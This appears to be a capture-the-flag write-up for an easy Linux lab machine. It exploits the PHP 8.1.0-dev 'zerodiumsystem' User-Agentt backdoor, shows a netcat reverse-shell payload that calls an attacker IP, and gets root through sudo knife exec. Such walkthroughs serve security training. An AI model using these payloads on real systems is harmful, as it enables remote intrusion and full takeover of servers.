Linux machine easy level

Table of Contents

1. Enumeration
2. Exploitation

3. Privilege Escalation

Enumeration:

Ports:

• 22 ssh OpenSSH 8.2p1
• 80 http Apache httpd 2.4.41 (Ubuntu)

Analyzing the website we found a vulnerability in the php version. This vulnerability allows us to execute arbitrary code in the “User Agent”.

VULNERABILITY

• Version: PHP 8.1.0-dev
• RCE in “User Agent”
• Source

Once we have found the vulnerability we proceed to exploit it. We will use BurpSuite and intercept a normal request from the server to our proxy.

We will use the User Agent which will allow us to do an RCE on the server.

• User-Agentt: zerodiumsystem(‘id’);

Exploitation:

We have already verified that it works, now it is time to exploit it and give us the reverse to our machine.

• I will use the reverse shell of “NetCat”.

  User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.201 1234 >/tmp/f');
  

Privilege escalation:

User Flag

Looking at what permissions the user has, we realize that he can run a binary as root.

• /usr/bin/knife

Looking at how this binary worked in the help manual I found something that caught my attention and I saw that scripts with the “exec” extension could be executed.

Now that we have found something useful and striking to execute commands as root, being able to execute scri.ts in this binary (which are executed as root) we proceed to implement a script that provides us with a shell.

We use the following command and get root shell:

sudo /usr/bin/knife exec --exec "exec '/bin/bash'"

Root Flag

Machine Completed